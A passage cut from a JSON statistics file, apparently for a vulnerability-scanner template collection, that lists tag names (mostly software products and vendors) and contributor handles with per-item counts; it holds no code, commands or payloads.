,{"name":"websocket","count":1},{"name":"amcrest","count":1},{"name":"logitech","count":1},{"name":"readthedocs","count":1},{"name":"caddy","count":1},{"name":"episerver","count":1},{"name":"gsm","count":1},{"name":"securenvoy","count":1},{"name":"exposed","count":1},{"name":"aura","count":1},{"name":"revive","count":1},{"name":"kaes","count":1},{"name":"catfishcms","count":1},{"name":"fleet","count":1},{"name":"badgeos","count":1},{"name":"websvn","count":1},{"name":"nvrmini","count":1},{"name":"apcu","count":1},{"name":"ncomputing","count":1},{"name":"osquery","count":1},{"name":"pyproject","count":1},{"name":"richfaces","count":1},{"name":"jvm","count":1},{"name":"bacnet","count":1},{"name":"cscart","count":1},{"name":"sage","count":1},{"name":"caa","count":1},{"name":"analytify","count":1},{"name":"bedita","count":1},{"name":"fedora","count":1},{"name":"lgate","count":1},{"name":"persis","count":1},{"name":"netbeans","count":1},{"name":"e-mobile","count":1},{"name":"europeana","count":1},{"name":"adWidget","count":1},{"name":"zenphoto","count":1},{"name":"zentao","count":1},{"name":"piluscart","count":1},{"name":"easyappointments","count":1},{"name":"incomcms","count":1},{"name":"web3storage","count":1},{"name":"rwebserver","count":1},{"name":"checkmarx","count":1},{"name":"shell","count":1},{"name":"cloudfoundry","count":1},{"name":"nearby","count":1},{"name":"x-ray","count":1},{"name":"ojs","count":1},{"name":"fanwei","count":1},{"name":"zentral","count":1},{"name":"satellian","count":1},{"name":"tekton","count":1},{"name":"purestorage","count":1},{"name":"duomicms","count":1},{"name":"webshell","count":1},{"name":"myvuehelp","count":1},{"name":"sureline","count":1},{"name":"nytimes","count":1},{"name":"narnoo-distributor","count":1},{"name":"nsicg","count":1},{"name":"nc2","count":1},{"name":"jhipster","count":1},{"name":"aerocms","count":1},{"name":"adfs","count":1},{"name":"qsan","count":1},{"name":"siteomat","count":1},{"name":"telecom","count":1},{"name":"extreme","count":1},{"name":"libvirt","count":1},{"name":"i3geo","count":1},{"name":"qmail","count":1},{"name":"trello","count":1},{"name":"adafruit","count":1},{"name":"clearfy-cache","count":1},{"name":"biometrics","count":1},{"name":"clockify","count":1},{"name":"thecatapi","count":1},{"name":"meraki","count":1},{"name":"paneil","count":1},{"name":"wpcargo","count":1},{"name":"cliniccases","count":1},{"name":"member-hero","count":1},{"name":"patheon","count":1},{"name":"ejs","count":1},{"name":"youtube","count":1},{"name":"wampserver","count":1},{"name":"mesos","count":1},{"name":"collectd","count":1},{"name":"geocode","count":1},{"name":"bscw","count":1},{"name":"fudforum","count":1},{"name":"webctrl","count":1},{"name":"abbott","count":1},{"name":"secui","count":1},{"name":"emlog","count":1},{"name":"tianqing","count":1},{"name":"room-alert","count":1},{"name":"backpack","count":1},{"name":"duplicator","count":1},{"name":"wallix","count":1},{"name":"wishpond","count":1},{"name":"web3","count":1},{"name":"docebo","count":1},{"name":"markdown","count":1},{"name":"etouch","count":1},{"name":"notificationx","count":1},{"name":"wget","count":1},{"name":"nweb2fax","count":1},{"name":"sls","count":1},{"name":"thedogapi","count":1},{"name":"spotify","count":1},{"name":"cuteeditor","count":1},{"name":"asana","count":1},{"name":"altn","count":1},{"name":"cdi","count":1},{"name":"emerson","count":1},{"name":"lionwiki","count":1},{"name":"sassy","count":1},{"name":"fcm","count":1},{"name":"airtable","count":1},{"name":"delta","count":1},{"name":"ventrilo","count":1},{"name":"slstudio","count":1},{"name":"segment","count":1},{"name":"tuxedo","count":1},{"name":"ecom","count":1},{"name":"juniper","count":1},{"name":"route","count":1},{"name":"tracking","count":1},{"name":"emessage","count":1},{"name":"rpcms","count":1},{"name":"kodi","count":1},{"name":"enumeration","count":1},{"name":"vagrant","count":1},{"name":"spartacus","count":1},{"name":"mediumish","count":1},{"name":"unauthenticated","count":1},{"name":"qlik","count":1},{"name":"awx","count":1},{"name":"ioncube","count":1},{"name":"labstack","count":1},{"name":"dvdFab","count":1},{"name":"instagram","count":1},{"name":"acunetix","count":1},{"name":"login-bypass","count":1},{"name":"shirnecms","count":1},{"name":"commscope","count":1},{"name":"mojoauth","count":1},{"name":"whm","count":1},{"name":"joget","count":1},{"name":"monitoring","count":1},{"name":"revslider","count":1},{"name":"primetek","count":1},{"name":"htmli","count":1},{"name":"mod-proxy","count":1},{"name":"sonarcloud","count":1},{"name":"helpdesk","count":1},{"name":"phpminiadmin","count":1},{"name":"xyxel","count":1},{"name":"juddi","count":1},{"name":"tamronos","count":1},{"name":"debian","count":1},{"name":"xenforo","count":1},{"name":"scalar","count":1},{"name":"openid","count":1},{"name":"ebird","count":1},{"name":"kerio","count":1},{"name":"ocomon","count":1},{"name":"pagekit","count":1},{"name":"lob","count":1},{"name":"coverity","count":1},{"name":"hfs","count":1},{"name":"ewebs","count":1},{"name":"yaws","count":1},{"name":"ssi","count":1},{"name":"tieline","count":1},{"name":"barco","count":1},{"name":"server","count":1},{"name":"novus","count":1},{"name":"pirelli","count":1},{"name":"zuul","count":1},{"name":"mdm","count":1},{"name":"monitorix","count":1},{"name":"incapptic-connect","count":1},{"name":"springframework","count":1},{"name":"guard","count":1},{"name":"nexusdb","count":1},{"name":"flureedb","count":1},{"name":"objectinjection","count":1},{"name":"comfortel","count":1},{"name":"tensorboard","count":1},{"name":"beanshell","count":1},{"name":"musicstore","count":1},{"name":"shodan","count":1},{"name":"quip","count":1},{"name":"oscommerce","count":1},{"name":"smarterstats","count":1},{"name":"wifisky","count":1},{"name":"securepoint","count":1},{"name":"profilegrid","count":1},{"name":"alerta","count":1},{"name":"knowage","count":1},{"name":"vision","count":1},{"name":"owa","count":1},{"name":"verint","count":1},{"name":"ti-woocommerce-wishlist","count":1},{"name":"aniapi","count":1},{"name":"opengraphr","count":1},{"name":"blackboard","count":1},{"name":"lumis","count":1},{"name":"helprace","count":1},{"name":"encompass","count":1},{"name":"opennebula","count":1},{"name":"piwik","count":1},{"name":"graphiql","count":1},{"name":"jspxcms","count":1},{"name":"accessmanager","count":1},{"name":"connect","count":1},{"name":"connect-central","count":1},{"name":"sqwebmail","count":1},{"name":"adminset","count":1},{"name":"qvidium","count":1},{"name":"scrapestack","count":1},{"name":"jeecg-boot","count":1},{"name":"projectdiscovery","count":1},{"name":"fullhunt","count":1},{"name":"smuggling","count":1},{"name":"mercurial","count":1},{"name":"accent","count":1},{"name":"ipvpn","count":1},{"name":"cve1028","count":1},{"name":"looker","count":1},{"name":"noescape","count":1},{"name":"goip","count":1},{"name":"extractor","count":1},{"name":"sogo","count":1},{"name":"pieregister","count":1},{"name":"macaddresslookup","count":1},{"name":"global","count":1},{"name":"rubedo","count":1},{"name":"drone","count":1},{"name":"u5cms","count":1},{"name":"floc","count":1},{"name":"locations","count":1},{"name":"moinmoin","count":1},{"name":"dnn","count":1},{"name":"details","count":1},{"name":"olt","count":1},{"name":"fontawesome","count":1},{"name":"webroot","count":1},{"name":"limesurvey","count":1},{"name":"muhttpd","count":1},{"name":"esxi","count":1},{"name":"bibliosoft","count":1},{"name":"keenetic","count":1},{"name":"utility","count":1},{"name":"scanii","count":1},{"name":"retool","count":1},{"name":"appweb","count":1},{"name":"lychee","count":1},{"name":"mapbox","count":1},{"name":"lokalise","count":1},{"name":"vodafone","count":1},{"name":"directorist","count":1},{"name":"tekon","count":1},{"name":"mx","count":1},{"name":"mailmap","count":1},{"name":"sentinelone","count":1},{"name":"siebel","count":1},{"name":"weboftrust","count":1},{"name":"ocean-extra","count":1},{"name":"placeos","count":1},{"name":"contentful","count":1},{"name":"fuji","count":1},{"name":"hortonworks","count":1},{"name":"rmc","count":1},{"name":"locklizard","count":1},{"name":"thinkserver","count":1},{"name":"api2convert","count":1},{"name":"rconfig.exposure","count":1},{"name":"wbcecms","count":1},{"name":"mspcontrol","count":1},{"name":"emc","count":1},{"name":"datahub","count":1},{"name":"vivotex","count":1},{"name":"esmtp","count":1},{"name":"opensmtpd","count":1},{"name":"surveysparrow","count":1},{"name":"containers","count":1},{"name":"mailwatch","count":1},{"name":"triconsole","count":1},{"name":"webpconverter","count":1},{"name":"soplanning","count":1},{"name":"timezone","count":1},{"name":"bhagavadgita","count":1},{"name":"grails","count":1},{"name":"reddit","count":1},{"name":"landray","count":1},{"name":"dasan","count":1},{"name":"defectdojo","count":1},{"name":"dropbox","count":1},{"name":"openssl","count":1},{"name":"airee","count":1},{"name":"wms","count":1},{"name":"cron","count":1},{"name":"remkon","count":1},{"name":"jumpcloud","count":1},{"name":"distance","count":1},{"name":"h5s","count":1},{"name":"opennms","count":1},{"name":"shindig","count":1},{"name":"nagios-xi","count":1},{"name":"buttercms","count":1},{"name":"hypertest","count":1},{"name":"sterling","count":1},{"name":"majordomo2","count":1},{"name":"babel","count":1},{"name":"lenovo","count":1},{"name":"tinymce","count":1},{"name":"issabel","count":1},{"name":"spiderfoot","count":1},{"name":"surreal","count":1},{"name":"csrfguard","count":1},{"name":"b2bbuilder","count":1},{"name":"ntop","count":1},{"name":"coinlayer","count":1},{"name":"orbintelligence","count":1},{"name":"screenshot","count":1},{"name":"maximo","count":1},{"name":"savepage","count":1},{"name":"autocomplete","count":1},{"name":"devalcms","count":1},{"name":"glowroot","count":1},{"name":"supersign","count":1},{"name":"acexy","count":1},{"name":"fortigates","count":1},{"name":"openedx","count":1},{"name":"vsphere","count":1},{"name":"buddypress","count":1},{"name":"luci","count":1},{"name":"airnotifier","count":1},{"name":"satellite","count":1},{"name":"roundcube","count":1},{"name":"magicflow","count":1},{"name":"likebtn-like-button","count":1},{"name":"orangeforum","count":1},{"name":"mdb","count":1},{"name":"blogengine","count":1},{"name":"tablereservation","count":1},{"name":"suprema","count":1},{"name":"klog","count":1},{"name":"syncthru","count":1},{"name":"ccm","count":1},{"name":"sprintful","count":1},{"name":"biostar2","count":1},{"name":"archibus","count":1},{"name":"webmodule-ee","count":1},{"name":"cname","count":1},{"name":"prexview","count":1},{"name":"nagvis","count":1},{"name":"csod","count":1},{"name":"meshcentral","count":1},{"name":"sgp","count":1},{"name":"webuzo","count":1},{"name":"cloudcenter","count":1},{"name":"xiuno","count":1},{"name":"blue-ocean","count":1},{"name":"wordcloud","count":1},{"name":"scs","count":1},{"name":"collegemanagement","count":1},{"name":"privx","count":1},{"name":"faust","count":1},{"name":"onelogin","count":1},{"name":"wpcentral","count":1},{"name":"shoppable","count":1},{"name":"file-upload","count":1},{"name":"ipfind","count":1},{"name":"supportivekoala","count":1},{"name":"opm","count":1},{"name":"cql","count":1},{"name":"tracing","count":1},{"name":"ucp","count":1},{"name":"contentify","count":1},{"name":"etcd","count":1},{"name":"skywalking","count":1},{"name":"userstack","count":1},{"name":"covalent","count":1},{"name":"cloudconvert","count":1},{"name":"ecshop","count":1},{"name":"mongoshake","count":1},{"name":"stem","count":1},{"name":"pyramid","count":1},{"name":"newsletter","count":1},{"name":"taiga","count":1},{"name":"launchdarkly","count":1},{"name":"rustici","count":1},{"name":"db2","count":1},{"name":"fastvue","count":1},{"name":"garagemanagementsystem","count":1},{"name":"nps","count":1},{"name":"dotclear","count":1},{"name":"m-files","count":1},{"name":"mongo-express","count":1},{"name":"pricing-deals-for-woocommerce","count":1},{"name":"angularjs","count":1},{"name":"backupbuddy","count":1},{"name":"avatier","count":1},{"name":"zeppelin","count":1},{"name":"learnpress","count":1},{"name":"tjws","count":1},{"name":"festivo","count":1},{"name":"apiflash","count":1},{"name":"ssltls","count":1},{"name":"krweb","count":1},{"name":"roteador","count":1},{"name":"mgrng","count":1},{"name":"gloo","count":1},{"name":"open-school","count":1},{"name":"simply-schedule-appointments","count":1},{"name":"ninja-forms","count":1},{"name":"achecker","count":1},{"name":"yealink","count":1},{"name":"wp-gdpr-compliance","count":1},{"name":"cybrotech","count":1},{"name":"jsapi","count":1},{"name":"genie","count":1},{"name":"limit","count":1},{"name":"activeadmin","count":1},{"name":"pulsesecure","count":1},{"name":"salesforce","count":1},{"name":"notion","count":1},{"name":"vcloud","count":1},{"name":"svn","count":1},{"name":"lacie","count":1},{"name":"kenesto","count":1},{"name":"remedy","count":1},{"name":"officekeeper","count":1},{"name":"inetutils","count":1},{"name":"pcoweb","count":1},{"name":"usc-e-shop","count":1},{"name":"flyteconsole","count":1},{"name":"lfw","count":1},{"name":"ns","count":1},{"name":"openview","count":1},{"name":"oneblog","count":1},{"name":"stats","count":1},{"name":"aero","count":1},{"name":"cors","count":1},{"name":"gnuboard5","count":1},{"name":"opencast","count":1},{"name":"mozilla","count":1},{"name":"eyou","count":1},{"name":"smtp2go","count":1},{"name":"admidio","count":1},{"name":"onlinefarm","count":1},{"name":"management","count":1},{"name":"mediation","count":1},{"name":"prototype","count":1},{"name":"h-sphere","count":1},{"name":"gnu","count":1},{"name":"spidercontrol","count":1},{"name":"darkstat","count":1},{"name":"realteo","count":1},{"name":"gofile","count":1},{"name":"securityspy","count":1},{"name":"elevation","count":1},{"name":"ourmgmt3","count":1},{"name":"tooljet","count":1},{"name":"opensso","count":1},{"name":"logger1000","count":1},{"name":"tarantella","count":1},{"name":"opencti","count":1},{"name":"ignition","count":1},{"name":"rsa","count":1},{"name":"phpfusion","count":1},{"name":"turbo","count":1},{"name":"kubecost","count":1},{"name":"phpmemcached","count":1},{"name":"myanimelist","count":1},{"name":"scrapingdog","count":1},{"name":"intel","count":1},{"name":"wazuh","count":1},{"name":"hivemanager","count":1},{"name":"ecsimagingpacs","count":1},{"name":"malwarebazaar","count":1},{"name":"stytch","count":1},{"name":"uberflip","count":1},{"name":"crystal","count":1},{"name":"sucuri","count":1},{"name":"shortcode","count":1},{"name":"giphy","count":1},{"name":"monday","count":1},{"name":"recovery","count":1},{"name":"loancms","count":1},{"name":"linktap","count":1},{"name":"librenms","count":1},{"name":"ocs-inventory","count":1},{"name":"suitecrm","count":1},{"name":"lvm","count":1},{"name":"geolocation","count":1},{"name":"defi","count":1},{"name":"xunchi","count":1},{"name":"totaljs","count":1},{"name":"bullwark","count":1},{"name":"kvm","count":1},{"name":"cuppa","count":1},{"name":"tls","count":1},{"name":"coinmarketcap","count":1},{"name":"gira","count":1},{"name":"zoneminder","count":1},{"name":"gorest","count":1},{"name":"catalogcreater","count":1},{"name":"rudloff","count":1},{"name":"intouch","count":1},{"name":"gopher","count":1},{"name":"ticketmaster","count":1},{"name":"pa11y","count":1},{"name":"drive","count":1},{"name":"infinitewp","count":1},{"name":"optimizely","count":1},{"name":"netweaver","count":1},{"name":"gerapy","count":1},{"name":"pingdom","count":1},{"name":"udraw","count":1},{"name":"manager","count":1},{"name":"d-link","count":1},{"name":"iframe","count":1},{"name":"shopizer","count":1},{"name":"acme","count":1},{"name":"box","count":1},{"name":"istat","count":1},{"name":"centreon","count":1},{"name":"noptin","count":1},{"name":"patreon","count":1},{"name":"karel","count":1},{"name":"dss","count":1},{"name":"ixbusweb","count":1},{"name":"beanstalk","count":1},{"name":"gemweb","count":1},{"name":"harmony","count":1},{"name":"goliath","count":1},{"name":"event","count":1},{"name":"vault","count":1},{"name":"clave","count":1},{"name":"ricoh","count":1},{"name":"contentkeeper","count":1},{"name":"shadoweb","count":1},{"name":"zblog","count":1},{"name":"visualtools","count":1},{"name":"dwr","count":1},{"name":"rainloop","count":1},{"name":"pane","count":1},{"name":"yachtcontrol","count":1},{"name":"html2wp","count":1},{"name":"aveva","count":1},{"name":"kodexplorer","count":1},{"name":"formcraft3","count":1},{"name":"rhymix","count":1},{"name":"blackduck","count":1},{"name":"moin","count":1},{"name":"sumowebtools","count":1},{"name":"whmcs","count":1},{"name":"biqsdrive","count":1},{"name":"logontracer","count":1},{"name":"iplanet","count":1},{"name":"beego","count":1},{"name":"formalms","count":1},{"name":"iq-block-country","count":1},{"name":"moveit","count":1},{"name":"snipeit","count":1},{"name":"exposures","count":1},{"name":"pan","count":1},{"name":"svnserve","count":1},{"name":"postmark","count":1},{"name":"jumpserver","count":1},{"name":"dnssec","count":1},{"name":"travis","count":1},{"name":"trane","count":1},{"name":"locust","count":1},{"name":"microcomputers","count":1},{"name":"php-fusion","count":1},{"name":"hcl","count":1},{"name":"axiom","count":1},{"name":"fms","count":1},{"name":"analytics","count":1},{"name":"openvz","count":1},{"name":"icinga","count":1},{"name":"omniampx","count":1},{"name":"awin","count":1},{"name":"fortilogger","count":1},{"name":"hanming","count":1},{"name":"sofneta","count":1},{"name":"javafaces","count":1},{"name":"mini_httpd","count":1},{"name":"edms","count":1},{"name":"pop3","count":1},{"name":"ip2whois","count":1},{"name":"themefusion","count":1},{"name":"codestats","count":1},{"name":"bravenewcoin","count":1},{"name":"datadog","count":1},{"name":"loganalyzer","count":1},{"name":"lancom","count":1},{"name":"iconfinder","count":1},{"name":"bingmaps","count":1},{"name":"mirasys","count":1},{"name":"smartping","count":1},{"name":"camunda","count":1},{"name":"buildbot","count":1},{"name":"niagara","count":1},{"name":"rss","count":1},{"name":"semaphore","count":1},{"name":"maccmsv10","count":1},{"name":"struts2","count":1},{"name":"ulterius","count":1},{"name":"system","count":1},{"name":"cloudron","count":1},{"name":"cpanel","count":1},{"name":"browserless","count":1},{"name":"fox","count":1},{"name":"quantum","count":1},{"name":"dradis","count":1},{"name":"sponip","count":1},{"name":"campaignmonitor","count":1},{"name":"aircube","count":1},{"name":"tcexam","count":1},{"name":"shopware","count":1},{"name":"upnp","count":1},{"name":"openpagerank","count":1},{"name":"clustering","count":1},{"name":"patreon-connect","count":1},{"name":"mrtg","count":1},{"name":"openv500","count":1},{"name":"bootstrap","count":1},{"name":"phpsec","count":1},{"name":"simplecrm","count":1},{"name":"free5gc","count":1},{"name":"expose","count":1},{"name":"zarafa","count":1}],"authors":[{"name":"dhiyaneshdk","count":701},{"name":"daffainfo","count":662},{"name":"pikpikcu","count":344},{"name":"pdteam","count":274},{"name":"geeknik","count":206},{"name":"pussycat0x","count":172},{"name":"dwisiswant0","count":171},{"name":"0x_akoko","count":170},{"name":"ritikchaddha","count":164},{"name":"princechaddha","count":153},{"name":"gy741","count":135},{"name":"arafatansari","count":107},{"name":"tess","count":85},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":62},{"name":"akincibor","count":55},{"name":"for3stco1d","count":49},{"name":"gaurang","count":42},{"name":"philippedelteil","count":37},{"name":"edoardottt","count":36},{"name":"c-sh0","count":34},{"name":"theamanrawat","count":31},{"name":"adam crosser","count":31},{"name":"righettod","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"ffffffff0x","count":22},{"name":"techbrunchfr","count":21},{"name":"cckuailong","count":18},{"name":"sullo","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"r3dg33k","count":14},{"name":"johnk3r","count":14},{"name":"tenbird","count":13},{"name":"random-robbie","count":13},{"name":"sharath","count":13},{"name":"0ri2n","count":13},{"name":"suman_kar","count":12},{"name":"melbadry9","count":12},{"name":"elsfa7110","count":11},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"dogasantos","count":11},{"name":"meme-lord","count":10},{"name":"alph4byt3","count":10},{"name":"random_robbie","count":10},{"name":"ricardomaia","count":10},{"name":"logicalhunter","count":10},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"0x240x23elu","count":9},{"name":"emadshanab","count":9},{"name":"oppsec","count":9},{"name":"that_juan_","count":8},{"name":"veshraj","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"zh","count":8},{"name":"lu4nx","count":8},{"name":"amit-jd","count":7},{"name":"caspergn","count":7},{"name":"divya_mudgal","count":7},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"leovalcante","count":7},{"name":"iamnoooob","count":6},{"name":"rootxharsh","count":6},{"name":"puzzlepeaches","count":6},{"name":"pathtaga","count":6},{"name":"__fazal","count":6},{"name":"evan rubinstein","count":6},{"name":"praetorian-thendrickson","count":6},{"name":"forgedhallpass","count":6},{"name":"nullfuzz","count":6},{"name":"_0xf4n9x_","count":6},{"name":"pentest_swissky","count":6},{"name":"imnightmaree","count":6},{"name":"gitlab red team","count":6},{"name":"panch0r3d","count":5},{"name":"podalirius","count":5},{"name":"joanbono","count":5},{"name":"nodauf","count":5},{"name":"its0x08","count":5},{"name":"clem9669","count":5},{"name":"xelkomy","count":5},{"name":"prajiteshsingh","count":5},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"hardik-solanki","count":4},{"name":"e_schultze_","count":4},{"name":"incogbyte","count":4},{"name":"tanq16","count":4},{"name":"scent2d","count":4},{"name":"dolev farhi","count":4},{"name":"powerexploit","count":4},{"name":"shine","count":4},{"name":"wisnupramoedya","count":4},{"name":"dadevel","count":4},{"name":"0xlittleboy","count":4},{"name":"defr0ggy","count":4},{"name":"robotshell","count":4},{"name":"h1ei1","count":4},{"name":"3th1c_yuk1","count":4},{"name":"r3naissance","count":4},{"name":"thomas_from_offensity","count":3},{"name":"fxploit","count":3},{"name":"z3bd","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"dr0pd34d","count":3},{"name":"ekrause","count":3},{"name":"sushantkamble","count":3},{"name":"atomiczsec","count":3},{"name":"fyoorer","count":3},{"name":"unstabl3","count":3},{"name":"arcc","count":3},{"name":"davidmckennirey","count":3},{"name":"alifathi-h1","count":3},{"name":"f1tz","count":3},{"name":"ambassify","count":3},{"name":"skeltavik","count":3},{"name":"mr-xn","count":3},{"name":"ph33r","count":3},{"name":"_generic_human_","count":3},{"name":"johnjhacking","count":3},{"name":"jarijaas","count":3},{"name":"supras","count":3},{"name":"binaryfigments","count":3},{"name":"lucasljm2001","count":3},{"name":"hahwul","count":3},{"name":"lark-lab","count":3},{"name":"shifacyclewala","count":3},{"name":"whoever","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"andydoering","count":3},{"name":"me9187","count":3},{"name":"swissky","count":3},{"name":"splint3r7","count":3},{"name":"kh4sh3i","count":3},{"name":"0w4ys","count":3},{"name":"emenalf","count":3},{"name":"dudez","count":3},{"name":"impramodsargar","count":3},{"name":"mavericknerd","count":3},{"name":"z0ne","count":2},{"name":"d4vy","count":2},{"name":"vavkamil","count":2},{"name":"thezakman","count":2},{"name":"r12w4n","count":2},{"name":"cckuakilong","count":2},{"name":"smaranchand","count":2},{"name":"0xsmiley","count":2},{"name":"sbani","count":2},{"name":"v0idc0de","count":2},{"name":"joshlarsen","count":2},{"name":"redteambrasil","count":2},{"name":"0xelkomy","count":2},{"name":"martincodes-de","count":2},{"name":"canberbamber","count":2},{"name":"pxmme1337","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"paradessia","count":2},{"name":"korteke","count":2},{"name":"0xrudra","count":2},{"name":"hetroublemakr","count":2},{"name":"kre80r","count":2},{"name":"dahse89","count":2},{"name":"vsh00t","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"danielmofer","count":2},{"name":"badboycxcc","count":2},{"name":"israel comazzetto dos reis","count":2},{"name":"dbrwsky","count":2},{"name":"bing0o","count":2},{"name":"socketz","count":2},{"name":"paperpen","count":2},{"name":"notnotnotveg","count":2},{"name":"geekby","count":2},{"name":"evergreencartoons","count":2},{"name":"ehsahil","count":2},{"name":"myztique","count":2},{"name":"afaq","count":2},{"name":"k11h-de","count":2},{"name":"thardt-praetorian","count":2},{"name":"moritz nentwig","count":2},{"name":"666asd","count":2},{"name":"bananabr","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"8arthur","count":2},{"name":"y4er","count":2},{"name":"luci","count":2},{"name":"dheerajmadhukar","count":2},{"name":"clarkvoss","count":2},{"name":"udit_thakkur","count":2},{"name":"0xcrypto","count":2},{"name":"kiblyn11","count":2},{"name":"bernardofsr","count":2},{"name":"x1m_martijn","count":2},{"name":"taielab","count":2},{"name":"kishore-hariram","count":2},{"name":"gevakun","count":2},{"name":"randomrobbie","count":2},{"name":"huowuzhao","count":2},{"name":"lotusdll","count":2},{"name":"nkxxkn","count":2},{"name":"n-thumann","count":2},{"name":"github.com/its0x08","count":2},{"name":"w4cky_","count":2},{"name":"gal nagli","count":2},{"name":"nuk3s3c","count":2},{"name":"brenocss","count":2},{"name":"0xprial","count":2},{"name":"zomsop82","count":2},{"name":"sy3omda","count":2},{"name":"amsda","count":2},{"name":"convisoappsec","count":2},{"name":"foulenzer","count":2},{"name":"ajaysenr","count":2},{"name":"koti2","count":2},{"name":"s0obi","count":2},{"name":"bsysop","count":2},{"name":"raesene","count":2},{"name":"nvn1729","count":2},{"name":"bp0lr","count":2},{"name":"parth","count":2},{"name":"ree4pwn","count":2},{"name":"rafaelwdornelas","count":2},{"name":"mohammedsaneem","count":2},{"name":"uomogrande","count":2},{"name":"codexlynx","count":2},{"name":"0xnirvana","count":2},{"name":"true13","count":2},{"name":"fabaff","count":2},{"name":"hackerarpan","count":2},{"name":"manas_harsh","count":2},{"name":"wa1tf0rme","count":2},{"name":"0xsapra","count":2},{"name":"cocxanh","count":2},{"name":"g4l1t0","count":2},{"name":"joeldeleep","count":2},{"name":"phyr3wall","count":1},{"name":"b4uh0lz","count":1},{"name":"qlkwej","count":1},{"name":"aringo","count":1},{"name":"0xrod","count":1},{"name":"daviey","count":1},{"name":"kurohost","count":1},{"name":"remonsec","count":1},{"name":"jaimin gondaliya","count":1},{"name":"momen eldawakhly","count":1},{"name":"absshax","count":1},{"name":"shreyapohekar","count":1},{"name":"ofjaaah","count":1},{"name":"_harleo","count":1},{"name":"amnotacat","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"oscarintherocks","count":1},{"name":"0xd0ff9","count":1},{"name":"nobody","count":1},{"name":"rotembar","count":1},{"name":"0h1in9e","count":1},{"name":"co0nan","count":1},{"name":"push4d","count":1},{"name":"dawid-czarnecki","count":1},{"name":"spac3wh1te","count":1},{"name":"wlayzz","count":1},{"name":"brabbit10","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"jeya seelan","count":1},{"name":"kiransau","count":1},{"name":"shivampand3y","count":1},{"name":"queencitycyber","count":1},{"name":"j33n1k4","count":1},{"name":"erethon","count":1},{"name":"0xteles","count":1},{"name":"sickwell","count":1},{"name":"ohlinge","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"philippdelteil","count":1},{"name":"8authur","count":1},{"name":"unkl4b","count":1},{"name":"akshansh","count":1},{"name":"opencirt","count":1},{"name":"bartu utku sarp","count":1},{"name":"hakluke","count":1},{"name":"danigoland","count":1},{"name":"miryangjung","count":1},{"name":"thebinitghimire","count":1},{"name":"bjhulst","count":1},{"name":"zsusac","count":1},{"name":"andirrahmani1","count":1},{"name":"official_blackhat13","count":1},{"name":"c3l3si4n","count":1},{"name":"davidfegyver","count":1},{"name":"natto97","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"noobexploiter","count":1},{"name":"ahmed abou-ela","count":1},{"name":"pry0cc","count":1},{"name":"bywalks","count":1},{"name":"ipanda","count":1},{"name":"gboddin","count":1},{"name":"retr0","count":1},{"name":"sherlocksecurity","count":1},{"name":"iphantasmic","count":1},{"name":"soyelmago","count":1},{"name":"daffianfo","count":1},{"name":"sec_hawk","count":1},{"name":"ggranjus","count":1},{"name":"viondexd","count":1},{"name":"rotemreiss","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"majidmc2","count":1},{"name":"yavolo","count":1},{"name":"izn0u","count":1},{"name":"exceed","count":1},{"name":"ahmetpergamum","count":1},{"name":"borna nematzadeh","count":1},{"name":"evolutionsec","count":1},{"name":"viniciuspereiras","count":1},{"name":"duty_1g","count":1},{"name":"ooooooo_q","count":1},{"name":"skylark-lab","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"xeldax","count":1},{"name":"whynotke","count":1},{"name":"notsoevilweasel","count":1},{"name":"cookiehanhoan","count":1},{"name":"revblock","count":1},{"name":"hakimkt","count":1},{"name":"arjunchandarana","count":1},{"name":"jna1","count":1},{"name":"luqmaan hadia","count":1},{"name":"af001","count":1},{"name":"dk999","count":1},{"name":"lethargynavigator","count":1},{"name":"francescocarlucci","count":1},{"name":"jbaines-r7","count":1},{"name":"affix","count":1},{"name":"intx0x80","count":1},{"name":"kareemse1im","count":1},{"name":"jas37","count":1},{"name":"breno_css","count":1},{"name":"paper-pen","count":1},{"name":"furkansayim","count":1},{"name":"ramkrishna sawant","count":1},{"name":"s1r1u5_","count":1},{"name":"zinminphy0","count":1},{"name":"udinchan","count":1},{"name":"omarkurt","count":1},{"name":"calumjelrick","count":1},{"name":"zhenwarx","count":1},{"name":"lamscun","count":1},{"name":"kabirsuda","count":1},{"name":"maximus decimus","count":1},{"name":"couskito","count":1},{"name":"carlosvieira","count":1},{"name":"ling","count":1},{"name":"0xceba","count":1},{"name":"aayush vishnoi","count":1},{"name":"andysvints","count":1},{"name":"elitebaz","count":1},{"name":"micha3lb3n","count":1},{"name":"undefl0w","count":1},{"name":"adrianmf","count":1},{"name":"nerrorsec","count":1},{"name":"geraldino2","count":1},{"name":"lrtk-coder","count":1},{"name":"sshell","count":1},{"name":"infosecsanyam","count":1},{"name":"caon","count":1},{"name":"0xceeb","count":1},{"name":"retr02332","count":1},{"name":"exid","count":1},{"name":"jaskaran","count":1},{"name":"pdp","count":1},{"name":"alperenkesk","count":1},{"name":"fmunozs","count":1},{"name":"manasmbellani","count":1},{"name":"shelld3v","count":1},{"name":"xstp","count":1},{"name":"sak1","count":1},{"name":"luqmaan hadia 